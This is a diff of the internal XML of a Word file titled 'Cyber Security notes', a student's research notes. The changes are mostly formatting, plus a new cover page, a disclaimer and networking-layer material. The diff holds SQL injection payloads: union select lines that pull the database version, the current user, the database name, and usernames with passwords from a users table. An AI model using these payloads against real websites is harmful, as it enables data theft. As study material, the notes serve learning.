                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -14400,7 +12053,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId132" cstate="print">
+                    <a:blip r:embed="rId137" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -14497,7 +12150,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId133">
+                    <a:blip r:embed="rId138">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -14664,31 +12317,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">3 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>‘ and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 1=0 union select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>null,version</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">() # -- to get the data the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>os</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> version of the system the website is running on.</w:t>
+        <w:t>3 ‘ and 1=0 union select null,version() # -- to get the data the os version of the system the website is running on.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14717,7 +12346,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId134">
+                    <a:blip r:embed="rId139">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -14864,26 +12493,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">3 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>‘ and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 1=0 union select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>null</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>() # -- to get name of the user.</w:t>
+        <w:t>3 ‘ and 1=0 union select null,user() # -- to get name of the user.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14912,7 +12522,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId135">
+                    <a:blip r:embed="rId140">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -15064,26 +12674,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">3 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>‘ and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 1=0 union select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>null</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,database</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>() # -- to get database name.</w:t>
+        <w:t>3 ‘ and 1=0 union select null,database() # -- to get database name.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15095,30 +12686,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">3 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>‘ and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 1=0 union select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>null</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,concat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(first_name,0x0a,password) from users # -- for username and passwords.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Normal"/>
+        <w:t>3 ‘ and 1=0 union select null,concat(first_name,0x0a,password) from users # -- for username and passwords.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:snapToGrid w:val="0"/>
           <w:color w:val="000000"/>
@@ -15154,7 +12725,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId136">
+                    <a:blip r:embed="rId141">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -20441,6 +18012,11 @@
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="ilfuvd">
+    <w:name w:val="ilfuvd"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00B43D45"/>
   </w:style>
 </w:styles>
 </file>
@@ -21659,7 +19235,7 @@
   <dgm:whole/>
   <dgm:extLst>
     <a:ext uri="http://schemas.microsoft.com/office/drawing/2008/diagram">
-      <dsp:dataModelExt xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" relId="rId126" minVer="http://schemas.openxmlformats.org/drawingml/2006/diagram"/>
+      <dsp:dataModelExt xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" relId="rId127" minVer="http://schemas.openxmlformats.org/drawingml/2006/diagram"/>
     </a:ext>
   </dgm:extLst>
 </dgm:dataModel>
@@ -23792,6 +21368,7 @@
   <w:rsids>
     <w:rsidRoot w:val="008849E7"/>
     <w:rsid w:val="000337AC"/>
+    <w:rsid w:val="000659A0"/>
     <w:rsid w:val="001A5E18"/>
     <w:rsid w:val="001F547F"/>
     <w:rsid w:val="00234847"/>
@@ -24539,7 +22116,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F13129F9-7D4B-4909-8743-D7ACE89BEB4E}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FF8DDDCB-BF9B-45F8-A527-4931F6DB1D6D}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -5,6 +5,500 @@
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
+          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:id w:val="702061131"/>
+        <w:docPartObj>
+          <w:docPartGallery w:val="Cover Pages"/>
+          <w:docPartUnique/>
+        </w:docPartObj>
+      </w:sdtPr>
+      <w:sdtEndPr>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
+        </w:rPr>
+      </w:sdtEndPr>
+      <w:sdtContent>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="NoSpacing"/>
+            <w:spacing w:before="1540" w:after="240"/>
+            <w:jc w:val="center"/>
+            <w:rPr>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+            </w:rPr>
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="1417320" cy="750898"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="143" name="Picture 143"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="3" name="t55.png"/>
+                        <pic:cNvPicPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill>
+                        <a:blip r:embed="rId6" cstate="print">
+                          <a:duotone>
+                            <a:schemeClr val="accent1">
+                              <a:shade val="45000"/>
+                              <a:satMod val="135000"/>
+                            </a:schemeClr>
+                            <a:prstClr val="white"/>
+                          </a:duotone>
+                          <a:extLst>
+                            <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                              <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                            </a:ext>
+                          </a:extLst>
+                        </a:blip>
+                        <a:stretch>
+                          <a:fillRect/>
+                        </a:stretch>
+                      </pic:blipFill>
+                      <pic:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1417320" cy="750898"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </w:r>
+        </w:p>
+        <w:sdt>
+          <w:sdtPr>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+              <w:caps/>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+              <w:sz w:val="72"/>
+              <w:szCs w:val="72"/>
+            </w:rPr>
+            <w:alias w:val="Title"/>
+            <w:tag w:val=""/>
+            <w:id w:val="1735040861"/>
+            <w:placeholder>
+              <w:docPart w:val="D90DBDEE5C78429BA6FF8C03C4C806AC"/>
+            </w:placeholder>
+            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
+            <w:text/>
+          </w:sdtPr>
+          <w:sdtEndPr>
+            <w:rPr>
+              <w:sz w:val="80"/>
+              <w:szCs w:val="80"/>
+            </w:rPr>
+          </w:sdtEndPr>
+          <w:sdtContent>
+            <w:p>
+              <w:pPr>
+                <w:pStyle w:val="NoSpacing"/>
+                <w:pBdr>
+                  <w:top w:val="single" w:sz="6" w:space="6" w:color="5B9BD5" w:themeColor="accent1"/>
+                  <w:bottom w:val="single" w:sz="6" w:space="6" w:color="5B9BD5" w:themeColor="accent1"/>
+                </w:pBdr>
+                <w:spacing w:after="240"/>
+                <w:jc w:val="center"/>
+                <w:rPr>
+                  <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+                  <w:caps/>
+                  <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                  <w:sz w:val="80"/>
+                  <w:szCs w:val="80"/>
+                </w:rPr>
+              </w:pPr>
+              <w:r>
+                <w:rPr>
+                  <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+                  <w:caps/>
+                  <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                  <w:sz w:val="72"/>
+                  <w:szCs w:val="72"/>
+                </w:rPr>
+                <w:t>Cyber Security notes</w:t>
+              </w:r>
+            </w:p>
+          </w:sdtContent>
+        </w:sdt>
+        <w:sdt>
+          <w:sdtPr>
+            <w:rPr>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+            <w:alias w:val="Subtitle"/>
+            <w:tag w:val=""/>
+            <w:id w:val="328029620"/>
+            <w:placeholder>
+              <w:docPart w:val="E4CE395554CC4730A52199F79156BCC9"/>
+            </w:placeholder>
+            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
+            <w:text/>
+          </w:sdtPr>
+          <w:sdtContent>
+            <w:p>
+              <w:pPr>
+                <w:pStyle w:val="NoSpacing"/>
+                <w:jc w:val="center"/>
+                <w:rPr>
+                  <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                  <w:sz w:val="28"/>
+                  <w:szCs w:val="28"/>
+                </w:rPr>
+              </w:pPr>
+              <w:r>
+                <w:rPr>
+                  <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                  <w:sz w:val="28"/>
+                  <w:szCs w:val="28"/>
+                </w:rPr>
+                <w:t>Should not be used for malicious intent</w:t>
+              </w:r>
+            </w:p>
+          </w:sdtContent>
+        </w:sdt>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="NoSpacing"/>
+            <w:spacing w:before="480"/>
+            <w:jc w:val="center"/>
+            <w:rPr>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+            </w:rPr>
+            <mc:AlternateContent>
+              <mc:Choice Requires="wps">
+                <w:drawing>
+                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                    <wp:simplePos x="0" y="0"/>
+                    <wp:positionH relativeFrom="margin">
+                      <wp:align>center</wp:align>
+                    </wp:positionH>
+                    <mc:AlternateContent>
+                      <mc:Choice Requires="wp14">
+                        <wp:positionV relativeFrom="page">
+                          <wp14:pctPosVOffset>85000</wp14:pctPosVOffset>
+                        </wp:positionV>
+                      </mc:Choice>
+                      <mc:Fallback>
+                        <wp:positionV relativeFrom="page">
+                          <wp:posOffset>9088120</wp:posOffset>
+                        </wp:positionV>
+                      </mc:Fallback>
+                    </mc:AlternateContent>
+                    <wp:extent cx="6553200" cy="557784"/>
+                    <wp:effectExtent l="0" t="0" r="0" b="12700"/>
+                    <wp:wrapNone/>
+                    <wp:docPr id="142" name="Text Box 142"/>
+                    <wp:cNvGraphicFramePr/>
+                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                        <wps:wsp>
+                          <wps:cNvSpPr txBox="1"/>
+                          <wps:spPr>
+                            <a:xfrm>
+                              <a:off x="0" y="0"/>
+                              <a:ext cx="6553200" cy="557784"/>
+                            </a:xfrm>
+                            <a:prstGeom prst="rect">
+                              <a:avLst/>
+                            </a:prstGeom>
+                            <a:noFill/>
+                            <a:ln w="6350">
+                              <a:noFill/>
+                            </a:ln>
+                            <a:effectLst/>
+                          </wps:spPr>
+                          <wps:style>
+                            <a:lnRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:lnRef>
+                            <a:fillRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:fillRef>
+                            <a:effectRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:effectRef>
+                            <a:fontRef idx="minor">
+                              <a:schemeClr val="dk1"/>
+                            </a:fontRef>
+                          </wps:style>
+                          <wps:txbx>
+                            <w:txbxContent>
+                              <w:p>
+                                <w:pPr>
+                                  <w:pStyle w:val="NoSpacing"/>
+                                  <w:jc w:val="center"/>
+                                  <w:rPr>
+                                    <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                                  </w:rPr>
+                                </w:pPr>
+                              </w:p>
+                            </w:txbxContent>
+                          </wps:txbx>
+                          <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                            <a:prstTxWarp prst="textNoShape">
+                              <a:avLst/>
+                            </a:prstTxWarp>
+                            <a:spAutoFit/>
+                          </wps:bodyPr>
+                        </wps:wsp>
+                      </a:graphicData>
+                    </a:graphic>
+                    <wp14:sizeRelH relativeFrom="margin">
+                      <wp14:pctWidth>100000</wp14:pctWidth>
+                    </wp14:sizeRelH>
+                    <wp14:sizeRelV relativeFrom="margin">
+                      <wp14:pctHeight>0</wp14:pctHeight>
+                    </wp14:sizeRelV>
+                  </wp:anchor>
+                </w:drawing>
+              </mc:Choice>
+              <mc:Fallback>
+                <w:pict>
+                  <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                    <v:stroke joinstyle="miter"/>
+                    <v:path gradientshapeok="t" o:connecttype="rect"/>
+                  </v:shapetype>
+                  <v:shape id="Text Box 142" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:516pt;height:43.9pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:1000;mso-height-percent:0;mso-top-percent:850;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical-relative:page;mso-width-percent:1000;mso-height-percent:0;mso-top-percent:850;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:bottom" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
+                    <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                      <w:txbxContent>
+                        <w:p>
+                          <w:pPr>
+                            <w:pStyle w:val="NoSpacing"/>
+                            <w:jc w:val="center"/>
+                            <w:rPr>
+                              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                            </w:rPr>
+                          </w:pPr>
+                        </w:p>
+                      </w:txbxContent>
+                    </v:textbox>
+                    <w10:wrap anchorx="margin" anchory="page"/>
+                  </v:shape>
+                </w:pict>
+              </mc:Fallback>
+            </mc:AlternateContent>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+            </w:rPr>
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="758952" cy="478932"/>
+                <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+                <wp:docPr id="144" name="Picture 144"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="9" name="roco bottom.png"/>
+                        <pic:cNvPicPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill>
+                        <a:blip r:embed="rId7" cstate="print">
+                          <a:duotone>
+                            <a:schemeClr val="accent1">
+                              <a:shade val="45000"/>
+                              <a:satMod val="135000"/>
+                            </a:schemeClr>
+                            <a:prstClr val="white"/>
+                          </a:duotone>
+                          <a:extLst>
+                            <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                              <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                            </a:ext>
+                          </a:extLst>
+                        </a:blip>
+                        <a:stretch>
+                          <a:fillRect/>
+                        </a:stretch>
+                      </pic:blipFill>
+                      <pic:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="758952" cy="478932"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:br w:type="page"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+            <w:lastRenderedPageBreak/>
+            <w:t>Di</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+            <w:t>s</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+            <w:t>claimer</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+            <w:t>:</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+            <w:t xml:space="preserve">The content below is taken from the web and semi built for my research on cyber security. The document is not official purpose so the picture credits are not given but are taken from multiple websites. </w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+            <w:t>Usage of information given below should only be used for non-malicious activity. Any consequences faced due improper use is not of my concern and I am not responsible for it.</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+            <w:rPr>
+              <w:b/>
+              <w:sz w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+          <w:bookmarkEnd w:id="0"/>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+            <w:rPr>
+              <w:b/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+            </w:rPr>
+            <w:br w:type="page"/>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+              <w:b/>
+              <w:bCs/>
+              <w:color w:val="262626"/>
+              <w:sz w:val="32"/>
+              <w:szCs w:val="38"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
+      </w:sdtContent>
+    </w:sdt>
+    <w:sdt>
+      <w:sdtPr>
+        <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
@@ -16,6 +510,7 @@
         <w:lock w:val="contentLocked"/>
         <w:group/>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:sdt>
           <w:sdtPr>
@@ -27,6 +522,7 @@
             <w:dataBinding w:xpath="/ns0:BlogPostInfo/ns0:PostTitle" w:storeItemID="{5F329CAD-B019-4FA6-9FEF-74898909AD20}"/>
             <w:text/>
           </w:sdtPr>
+          <w:sdtEndPr/>
           <w:sdtContent>
             <w:p>
               <w:pPr>
@@ -119,6 +615,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -138,7 +635,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6">
+                    <a:blip r:embed="rId8">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -254,6 +751,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -273,7 +771,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7" cstate="print">
+                    <a:blip r:embed="rId9" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -353,6 +851,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Bit synchronization:</w:t>
       </w:r>
       <w:r>
@@ -385,7 +884,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Bit rate control:</w:t>
       </w:r>
       <w:r>
@@ -677,6 +1175,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -696,7 +1195,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8" cstate="print">
+                    <a:blip r:embed="rId10" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -886,6 +1385,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Access control: </w:t>
       </w:r>
       <w:r>
@@ -914,7 +1414,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">* Packet in Data Link layer is referred as </w:t>
       </w:r>
       <w:r>
@@ -1145,6 +1644,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -1164,7 +1664,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9" cstate="print">
+                    <a:blip r:embed="rId11" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1395,6 +1895,14 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
+      </w:r>
+      <w:r>
